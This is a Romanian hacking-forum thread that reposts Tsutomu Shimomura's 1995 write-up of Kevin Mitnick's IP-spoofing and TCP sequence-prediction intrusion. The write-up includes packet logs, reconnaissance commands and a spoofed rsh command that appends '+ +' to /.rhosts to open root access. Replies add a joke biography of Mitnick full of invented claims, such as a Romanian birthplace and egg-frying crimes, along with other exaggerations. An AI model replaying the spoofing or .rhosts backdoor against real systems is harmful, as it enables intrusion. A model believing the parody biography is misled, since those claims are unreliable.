How Mitnick Hacked Tsutomu

Hacking and more...
HaCkinG CulT

Lista Forumurilor Pe Tematici

Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat.

Nou pe simpatie:
Anna281

Femeie
25 ani
Iasi
cauta Barbat
25 - 44 ani

Hacking and more... / Hacking-ul nostru cel de toate zilele / How Mitnick Hacked Tsutomu

Moderat de Shocker

Autor

Mesaj

Pagini: 1

epic
User

Inregistrat: acum 18 ani
Postari: 1896

Code:

How Mitnick Hacked Tsutomu Shimomura with an IP Sequence Attack
by Tsutomu Shimomura
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site. 
How Mitnick hacked Tsutomu Shimomura with an IP sequence attack
System: TCP/IP
Source:  .edu (Tsutomu Shimomura),
Date: 25 Jan 1995 

There seems to be a lot of confusion about the IP address spoofing and connection hijacking attacks described by John Markoff's 1/23/95 NYT article, and CERT advisory CA-95:01. Here are some technical details from my presentation on 1/11/95 at CMAD 3 in Sonoma, California. Hopefully this will help clear up any misunderstandings as to the nature of these attacks. 

Two different attack mechanisms were used. IP source address spoofing and TCP sequence number prediction were used to gain initial access to a diskless workstation being used mostly as an X terminal. After root access had been obtained, an existing connection to another system was hijacked by means of a loadable kernel STREAMS module. 

Included in this note are excerpts from actual tcpdump packet logs generated by this attack. In the interest of clarity (and brevity!), some of the data has been omitted. I highly recommend Steve Bellovin's paper and posts on IP spoofing, as he describes in more detail the semantics of the TCP handshake, as well as making some suggestions on how to defeat this attack. 

My configuration is as follows: server = a SPARCstation running Solaris 1 serving my "X terminal"
x-terminal = a diskless SPARCstation running Solaris 1
target = the apparent primary target of the attack 

The IP spoofing attack started at about 14:09:32 PST on 12/25/94. The first probes were from toad.com (this info derived from packet logs): 

14:09:32 toad.com# cenzurat -l @target
14:10:21 toad.com# cenzurat -l @server
14:10:50 toad.com# cenzurat -l  
14:11:07 toad.com# cenzurat -l @x-terminal
14:11:38 toad.com# showmount -e x-terminal
14:11:49 toad.com# rpcinfo -p x-terminal
14:12:05 toad.com# cenzurat -l   

The apparent purpose of these probes was to determine if there might be some kind of trust relationship amongst these systems which could be exploited with an IP spoofing attack. The source port numbers for the showmount and rpcinfo indicate that the attacker is root on toad.com. 

About six minutes later, we see a flurry of TCP SYNs (initial connection requests) from 130.92.6.97 to port 513 (login) on server. The purpose of these SYNs is to fill the connection queue for port 513 on server with "half-open" connections so it will not respond to any new connection requests. In particular, it will not generate TCP RSTs in response to unexpected SYN-ACKs. 

As port 513 is also a "privileged" port (< IPPORT_RESERVED), server.login can now be safely used as the putative source for an address spoofing attack on the UNIX "r-services" (rsh, rlogin). 130.92.6.97 appears to be a random (forged) unused address (one that will not generate any response to packets sent to it): 

14:18:22.516699 130.92.6.97.600 > server.login: S 1382726960:1382726960(0) win 4096
14:18:22.566069 130.92.6.97.601 > server.login: S 1382726961:1382726961(0) win 4096
14:18:22.744477 130.92.6.97.602 > server.login: S 1382726962:1382726962(0) win 4096
14:18:22.830111 130.92.6.97.603 > server.login: S 1382726963:1382726963(0) win 4096
14:18:22.886128 130.92.6.97.604 > server.login: S 1382726964:1382726964(0) win 4096
14:18:22.943514 130.92.6.97.605 > server.login: S 1382726965:1382726965(0) win 4096
14:18:23.002715 130.92.6.97.606 > server.login: S 1382726966:1382726966(0) win 4096
14:18:23.103275 130.92.6.97.607 > server.login: S 1382726967:1382726967(0) win 4096
14:18:23.162781 130.92.6.97.608 > server.login: S 1382726968:1382726968(0) win 4096
14:18:23.225384 130.92.6.97.609 > server.login: S 1382726969:1382726969(0) win 4096
14:18:23.282625 130.92.6.97.610 > server.login: S 1382726970:1382726970(0) win 4096
14:18:23.342657 130.92.6.97.611 > server.login: S 1382726971:1382726971(0) win 4096
14:18:23.403083 130.92.6.97.612 > server.login: S 1382726972:1382726972(0) win 4096
14:18:23.903700 130.92.6.97.613 > server.login: S 1382726973:1382726973(0) win 4096
14:18:24.003252 130.92.6.97.614 > server.login: S 1382726974:1382726974(0) win 4096
14:18:24.084827 130.92.6.97.615 > server.login: S 1382726975:1382726975(0) win 4096
14:18:24.142774 130.92.6.97.616 > server.login: S 1382726976:1382726976(0) win 4096
14:18:24.203195 130.92.6.97.617 > server.login: S 1382726977:1382726977(0) win 4096
14:18:24.294773 130.92.6.97.618 > server.login: S 1382726978:1382726978(0) win 4096
14:18:24.382841 130.92.6.97.619 > server.login: S 1382726979:1382726979(0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S 1382726980:1382726980(0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S 1382726981:1382726981(0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S 1382726982:1382726982(0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S 1382726983:1382726983(0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S 1382726984:1382726984(0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S 1382726985:1382726985(0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S 1382726986:1382726986(0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S 1382726987:1382726987(0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S 1382726988:1382726988(0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S 1382726989:1382726989(0) win 4096 

server generated SYN-ACKs for the first eight SYN requests before the connection queue filled up. server will periodically retransmit these SYN-ACKs as there is nothing to ACK them. 

We now see 20 connection attempts from apollo.it.luc.edu to x-terminal.shell. The purpose of these attempts is to determine the behavior of x-terminal's TCP sequence number generator. Note that the initial sequence numbers increment by one for each connection, indicating that the SYN packets are *not* being generated by the system's TCP implementation. This results in RSTs conveniently being generated in response to each unexpected SYN-ACK, so the connection queue on x-terminal does not fill up: 

14:18:25.906002 apollo.it.luc.edu.1000 > x-terminal.shell: S 1382726990:1382726990(0) win 4096 14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S 2021824000:2021824000(0) ack 1382726991 win 4096 14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R 1382726991:1382726991(0) win 0 14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S 1382726991:1382726991(0) win 4096 14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S 2021952000:2021952000(0) ack 1382726992 win 4096 14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R 1382726992:1382726992(0) win 0 14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S 1382726992:1382726992(0) win 4096 14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S 2022080000:2022080000(0) ack 1382726993 win 4096 14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R 1382726993:1382726993(0) win 0 14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S 1382726993:1382726993(0) win 4096 14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S 2022208000:2022208000(0) ack 1382726994 win 4096 14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R 1382726994:1382726994(0) win 0 14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S 1382726994:1382726994(0) win 4096 14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S 2022336000:2022336000(0) ack 1382726995 win 4096 14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R 1382726995:1382726995(0) win 0 14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S 1382726995:1382726995(0) win 4096 14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S 2022464000:2022464000(0) ack 1382726996 win 4096 14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R 1382726996:1382726996(0) win 0 14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S 1382726996:1382726996(0) win 4096 14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S 2022592000:2022592000(0) ack 1382726997 win 4096 14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win 0 14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R 1382726997:1382726997(0) win
0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S 1382726997:1382726997(0) win
4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S 2022720000:2022720000(0) ack
1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R 1382726998:1382726998(0) win
0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S 1382726998:1382726998(0) win
4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S 2022848000:2022848000(0) ack
1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R 1382726999:1382726999(0) win
0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S 1382726999:1382726999(0) win
4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S 2022976000:2022976000(0) ack
1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R 1382727000:1382727000(0) win
0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S 1382727000:1382727000(0) win
4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S 2023104000:2023104000(0) ack
1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R 1382727001:1382727001(0) win
0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S 1382727001:1382727001(0) win
4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S 2023232000:2023232000(0) ack
1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R 1382727002:1382727002(0) win
0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S 1382727002:1382727002(0) win
4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S 2023360000:2023360000(0) ack
1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R 1382727003:1382727003(0) win
0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S 1382727003:1382727003(0) win
4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S 2023488000:2023488000(0) ack
1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R 1382727004:1382727004(0) win
0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S 1382727004:1382727004(0) win
4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S 2023616000:2023616000(0) ack
1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R 1382727005:1382727005(0) win
0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S 1382727005:1382727005(0) win
4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S 2023744000:2023744000(0) ack
1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R 1382727006:1382727006(0) win
0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S 1382727006:1382727006(0) win
4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S 2023872000:2023872000(0) ack
1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R 1382727007:1382727007(0) win
0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S 1382727007:1382727007(0) win
4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S 2024000000:2024000000(0) ack
1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R 1382727008:1382727008(0) win
0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S 1382727008:1382727008(0) win
4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S 2024128000:2024128000(0) ack
1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R 1382727009:1382727009(0) win
0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S 
1382727009:1382727009(0) win
4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S 
2024256000:2024256000(0) ack
1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R 
1382727010:1382727010(0) win
0 

Note that each SYN-ACK packet sent by x-terminal has an initial sequence number which is 128,000 greater than the previous one. 

We now see a forged SYN (connection request), allegedly from server.login to x-terminal.shell. The assumption is that x-terminal probably trusts server, so x-terminal will do whatever server (or anything masquerading as server) asks. 

x-terminal then replies to server with a SYN-ACK, which must be ACK'd in order for the connection to be opened. As server is ignoring packets sent to server.login, the ACK must be forged as well. 

Normally, the sequence number from the SYN-ACK is required in order to generate a valid ACK. However, the attacker is able to predict the sequence number contained in the SYN-ACK based on the known behavior of x-terminal's TCP sequence number generator, and is thus able to ACK the SYN-ACK without seeing it: 

14:18:36.245045 server.login > x-terminal.shell: S 1382727010:1382727010(0) win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack 2024384001 win 4096 

The spoofing machine now has a one-way connection to x-terminal.shell which appears to be from server.login. It can maintain the connection and send data provided that it can properly ACK any data sent by x-terminal. It sends the following: 

14:18:37.265404 server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack 1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25) ack 1 win 4096 

which corresponds to:
14:18:37 server# rsh x-terminal "echo + + >>/.rhosts" 

Total elapsed time since the first spoofed packet: < 16 seconds 

The spoofed connection is now shut down: 

14:18:41.347003 server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win 4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0) ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R 1382727043:1382727043(0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R 1382727044:1382727044(0) win 4096


We now see RSTs to reset the "half-open" connections and empty the connection queue for server.login: 

14:18:52.298431 130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win 4096
14:18:52.363877 130.92.6.97.601 > server.login: R 1382726961:1382726961(0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R 1382726962:1382726962(0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R 1382726963:1382726963(0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R 1382726964:1382726964(0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R 1382726965:1382726965(0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R 1382726966:1382726966(0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R 1382726967:1382726967(0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R 1382726968:1382726968(0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R 1382726969:1382726969(0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R 1382726970:1382726970(0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R 1382726971:1382726971(0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R 1382726972:1382726972(0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R 1382726973:1382726973(0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R 1382726974:1382726974(0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R 1382726975:1382726975(0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R 1382726976:1382726976(0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R 1382726977:1382726977(0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R 1382726978:1382726978(0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R 1382726979:1382726979(0) win 4096
14:18:53.556753 130.92.6.97.620 > server.login: R 1382726980:1382726980(0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R 1382726981:1382726981(0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R 1382726982:1382726982(0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R 1382726983:1382726983(0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R 1382726984:1382726984(0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R 1382726985:1382726985(0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R 1382726986:1382726986(0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R 1382726987:1382726987(0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R 1382726988:1382726988(0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R 1382726989:1382726989(0) win 4096 

server.login can again accept connections. 

After root access had been gained via IP address spoofing, a kernel module named "tap-2.01" was compiled and installed on x-terminal: 

x-terminal% modstat
Id Type Loadaddr Size B-major C-major Sysnum Mod Name
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha 

x-terminal% ls -l /dev/tap
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap 

This appears to be a kernel STREAMS module which can be pushed onto an existing STREAMS stack and used to take control of a tty device. It was used to take control of an already authenticated login session to target at about 14:51 PST. 

Of course, no attack would be complete without the personal touch. Check out: 

ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dee.au 

ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dum.au 

These are in Sun audio file format, 8-bit u-law, 8 khz sample rate. 

Tsutomu Shimomura   +1 619 534 5050
University of California at San Diego/San Diego Supercomputer Center, USA

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani

3Nigma
Member of RedTeam

Inregistrat: acum 18 ani
Postari: 325

Genial prin simplitate...pacat ca lumea a invata din astfel de atacuri

!
Grea mai ii viata unui hacker.

pus acum 18 ani

1o1
Little Kevin

Inregistrat: acum 18 ani
Postari: 46

O singura intrebare : Cine a fost Mitnick asta?

_______________________________________
Bag banii in el de forum!

Care vrea sa facem un hack?!

pus acum 18 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 18 ani
Postari: 1602

:-)) un hacker :-) ...prins din pacate :-P
si chinezu' ala tot hacker era...si ...nah ...un hacker a intrat in pcul altui hacker :-P

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 18 ani

1o1
Little Kevin

Inregistrat: acum 18 ani
Postari: 46

Pai hacker vazui si eu ca era, da` ma intrebam unde statea, etc etc

_______________________________________
Bag banii in el de forum!

Care vrea sa facem un hack?!

pus acum 18 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 18 ani
Postari: 1602

:-))) ai intrebat cine e nu unde sta :-)) google it :-P

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 18 ani

1o1
Little Kevin

Inregistrat: acum 18 ani
Postari: 46

Mitnick si mai cum?

_______________________________________
Bag banii in el de forum!

Care vrea sa facem un hack?!

pus acum 18 ani

Y2K`
Elite Member

Din: 666
Inregistrat: acum 18 ani
Postari: 970

kevin

pus acum 18 ani

3Nigma
Member of RedTeam

Inregistrat: acum 18 ani
Postari: 325

pe scurt...o fo primul hacker arestat din istoria WWW-ului(incepand din '92)...a fost arestat in '98 parca si fiind primul "dupa el potopul"

de asta are asa de multa popularitate kevin...Sursa: un documentar mai vechi

pus acum 18 ani

1o1
Little Kevin

Inregistrat: acum 18 ani
Postari: 46

AM AFLAT!!!

Kevin Mitnick este unul dintre cei mai cunoscuti bucatari cu merite in domeniul informaticii...Arestarea lui a fost foarte mediatizata si faptul ca un ex-pirat informatic- Tsutomu Shimomura- a participat n-a schimbat mult lucrurile...

Ca informatie, Kevin Mitnick s-a nascut pe 6 august 1964, intr-un cartier al Galatiului, sub numele real de Pavel Mitica mutandu-se in Statele Unite la varsta de 14 ani. Provenind dintr-o famile modesta, la sfarsitul anilor 70 Kevin a trebuit sa treaca peste drama divortului parintilor sai...Acesti ani il gasesc pe Kevin in cautarea aventurii ca oricare copil de varsta sa....Dupa sfarsitul anilor 70, informatica a devenit o moda, asa ca Kevin nu putea ramane indiferent....Sunt anii in care isi incepe activitatea de bucatar, phreak, cracking...underground in general...

Ca de fiecare data, lui Kevin i-au fost atribuite tot felul de crime.. Despre el se spune chiar ca ar spanzurat racii inainte sa-i fiarba. Desi sirul este foarte lung, mi-am permis sa enumar doar cateva care au socat intreaga lume informatica si au facut cunoscut mintul Kevin Mitnick in intreaga lume...

Adolescent fiind, a deturnat serviciul informatic de telefonie (931 din Romania) ...Cand un abonat suna pentru a obtine informatii, dadea de Mitnick sau de unul dintre asociatii acestuia.. Acestia ii intrebau pe abonati: "Persoana dspre care cautati informatii este alba sau neagra? Pentru ca tinem registre diferite pentru fiecare..."

Potrivit unui articol in Flacara din decembrie 1988, Mitnick avea 17 ani cand s-a infiltrat in computerele Pacific Bell, modificand facturile telefonice....Steven Rhoades- un vechi prieten - a afirmat ca Mitnick si el au patruns impreuna, in 1979 intr-o statie a North American Air Defense Command pentru a-si pregati cartofi prajiti in momentul lansarii unei rachete...Exploiturile sale in computerele administratiei americane au inspirat celebrul film "Emanuelle" difuzat pentru prima oara in 1983 cand un adolescent era pe punctul de a declansa un razboi mondial din cauza piratajelor sale ale retetelor de prajituri cu dude...Bineinteles, Mitnick a negat toate acuzatiile...

Atunci cand era dat in urmarire, Mitnick a reusit sa preia controlul unui sistem informatic californian, cu ajutorul caruia a reusit sa asculte convorbirile agentilor FBI care-l cautau pentru a-i fura retetele...Nickul sub care era cunoscut- "The Condor" explica de fapt intreaga cariera de pirat informatic: "The condor" vine de la un film a lui Stefan Banica in care eroul trebuia sa faca fata unui complot guvernamental...Kevin Mitnick a fost apoi acuzat ca a facut gauri de circa 4 milioane de dolari unui computer a DEC (Digital Equipment Corp.) incercat sa prajeasca oua pe procesor...Pentru aceasta in 1989 a suferit 8 luni de detentie si apoi inca alte 4 luni ...

Dupa iesirea din inchisoare Mitnick a cautat sa mai repare din greselile trecutului... a publicat ingredientele secrete din faimoasa lui mamaliga vieneza dar agentul sau de paza "avea grija" sa telefoneze restaurantelor care doreau sa-l angaje pe Kevin pentru ai avertiza de pericolul pe care acesta il reprezenta pentru companie...The battle goes on!

Pe 15 februarie 1995 FBIul il aresteaza pe Mitnick...Este acuzat, printre altele de posesie ilegala de sare iodata...Este condamnat la 35 ani de inchisoare...Nu poate telefona decat avocatului sau, mamei si bunicii sale...De ce asa strict? Se credea ca apeland un alt numar va amorsa un virus,,,,un numar care odata apelat ar fi putut declansa o batalie cu frisca.

In decembrie 1997, membrii unei organizatii intitulate "Condor's Friends" si cei ai "Pants/Hagis" au amenintat sistemele informatice ale planetei de un atac catastrofal cu oua clocite...Cereau, bineinteles, eliberarea lui Kevin inchis intr-o inchisoare in Los Angeles...Mesajul de avertizare a aparut pentru scurt timp pe motorul de cautare Yahoo...De asemenea, cateva saptamani mai tarziu, pe siturile unor importante organisme internationale (UNICEF, UNESCO, FBI, US Air Force, McDonalds)...In 1998 razboiul psihologic a continuat cu noi amenintari si declaratii de razboi informatic, de aceasta data mesaje de amenintare aparand pe situl FBI, dar si pe cel a New York Times, constand in amenintari ca Mitnick isi va da jos ciorapii in inchisoare declansand un cataclism...Incepand cu ianuarie 1999 atacurile asupra siturilor avand drept scop eliberarea lui Kevin Mitnick s-au dublat...Pe 16 martie 1999, Kevin Mitnick si-a recunoscut vina in cinci din cele cinci acuzatii care i-au fost aduse de piperare excesiva a meniurilor de kebab...

Dupa ce a executat o pedeapsa de cinci ani, pe 21 ianuarie 2000 a fost eliberat...Are in acest moment 36 de ani...Astazi Kevin este in liberate dar in libertate conditionata...Locuind cu tatal sau, nu are dreptul sa se atinga de o tigaie, nici macar de un aparat conectat la un aragaz...

Isi petrece timpul liber conducandu-l pe tatal sau la examene medicale sau rasfoind ofertele zilnice de munca care probabil i-ar permite sa-si plateasca datoriile...Bineinteles, nu lipsesc nici ziaristii care incearca mereu sa demonteze "mitul Kevin Mitnick"...Nici o companie nu isi va asuma probabil riscul de a angaja un bucatar cu o asemenea reputatie...De asemenea, majoritatea lor sunt constiente ca Kevin se poate transforma intr-un adevarat pericol pentru sistemele bucatariei internationale...

Sursa:

_______________________________________
Bag banii in el de forum!

Care vrea sa facem un hack?!

pus acum 18 ani

epic
User

Inregistrat: acum 18 ani
Postari: 1896

LOL

Luati filmul asta: Hackers 2 Takedown

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani

Parazitu_2009
Grand Master

Inregistrat: acum 18 ani
Postari: 305

loollz!tare piftelutza asta...app,e mijto filmul

_______________________________________

Omul care nu are nimic de pierdut e cel mai greu de invins.

pus acum 18 ani

Inside
Elite Member

Din: ..:: Angels City ::..
Inregistrat: acum 18 ani
Postari: 1351

miatzi facut pofta de kebab ... si de frisca..

)

_______________________________________

pus acum 18 ani

epic
User

Inregistrat: acum 18 ani
Postari: 1896

si eu ash manca un kebab

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!

pus acum 18 ani

Inside
Elite Member

Din: ..:: Angels City ::..
Inregistrat: acum 18 ani
Postari: 1351

anm citit pe indelete fisa bibliografica a lui Kevin asta.. pan la urma. .era bucatar ..sau hacker .. .. :d si ce oua o incercat sa prajeasca pe procesoru ala ?

ale lui sau de la gaina ?

_______________________________________

pus acum 18 ani

Parazitu_2009
Grand Master

Inregistrat: acum 18 ani
Postari: 305

asta era bun la toate...facea salata din taste

_______________________________________

Omul care nu are nimic de pierdut e cel mai greu de invins.

pus acum 18 ani

byjunior
Elite Member

Din: Your PC
Inregistrat: acum 18 ani
Postari: 651

Parazitu_2009 a scris:

asta era bun la toate...facea salata din taste

_______________________________________

Tv online

pus acum 18 ani

Mr.Mitnick
Membru nou

Din: Bacau
Inregistrat: acum 18 ani
Postari: 8

Exact

pus acum 18 ani

Sinnerman
Grand Master

Inregistrat: acum 18 ani
Postari: 322

Era priceput tare gagiu' bravo lui :P

_______________________________________
Toate drumurile care duc in iad sunt drumuri cu sens unic.

pus acum 18 ani

FishBoneZ
Elite Member

Din: Ardealean!
Inregistrat: acum 18 ani
Postari: 507

nu va luati dupa ce scrie acolo ca cine stie la ce concluzi ajungeti.. Kevin Mitnick asta a fost printre primii hackerii ai lumii, el nu fiind terorist sau criminal, el era savant, cu ajutorul lui s`au construit primele apleuri si printre primele programe GUI, tot el a contribuit la dezvoltarea retelelor si evolutiei rapide a programelor de nivel inalt, cautati`va documentare video pe internet si luati si uimiti`va, deci tipul asta dupa parerea mea a fost printre cele mai stralucite minti contemporane.. PS: am peste 25 de documentare si interviuri despre Kevin Mitnick si evoluatia hacerilor

_______________________________________
Cauta-Ma ! www.google.com

pus acum 18 ani

OSHO
Elite Member

Din: Cluj
Inregistrat: acum 18 ani
Postari: 2069

1o1 a scris:

Kevin Mitnick s-a nascut pe 6 august 1964, intr-un cartier al Galatiului, sub numele real de Pavel Mitica mutandu-se in Statele Unite la varsta de 14 ani.

100% bullshit

S-a nascut in 1963 in Van Nuys, California nu in 1964 in Galati.

_______________________________________

IPFind: IP Finder and browser revealer
SkullBox: IT pentru incepatori
_______________________________________

pus acum 18 ani

maleficus
Elite Member

Din: 0111 1000
Inregistrat: acum 18 ani
Postari: 515

eu acu vad ce vorbiti voi aici prima daat knd zic si eu LOL ...ba...ce ati mancat?

_______________________________________
Viata e un joc de c***t ... dar macar are grafica buna!!!
onlain gheims...

pus acum 17 ani

Sad_Dreamer
Elite Member

Inregistrat: acum 18 ani
Postari: 1602

OSHO a scris:

1o1 a scris:

Kevin Mitnick s-a nascut pe 6 august 1964, intr-un cartier al Galatiului, sub numele real de Pavel Mitica mutandu-se in Statele Unite la varsta de 14 ani.

100% bullshit

S-a nascut in 1963 in Van Nuys, California nu in 1964 in Galati.

nu minti lumea aiurea...e galatean de-al nostru :-)))

_______________________________________
In caz ca nu sti...Getting Laid <> Getting r00t

pus acum 17 ani

z3nDo0r2k`
Junior

Inregistrat: acum 17 ani
Postari: 21

chiar prea tare .... ma prapadeam de ras in tim ce citeam mai aveam un pic si chiar ROTFL cand am auzit de Kevin ca e din Galatzi .... chiar ce ar mai fi .... oricum sa stiti ca in Galatzi sunt niste baietzi care chiar stiu ce fac ....

pus acum 17 ani

Cristian
Grand Master

Inregistrat: acum 18 ani
Postari: 268

maleficus a scris:

LOL ...ba...ce ati mancat?

oua prajite pe procesor..cu salata deaia de taste irlandeze

_______________________________________
Decrypt {"196eba4dc7ce0dc64677a6ef22669c1d"}
Status:???
Status: fn{DECRYPTION) Succesfull !
-msg // * " MASTER I AM HERE TO SERVE YOU "

pus acum 17 ani

Pagini: 1

Mergi la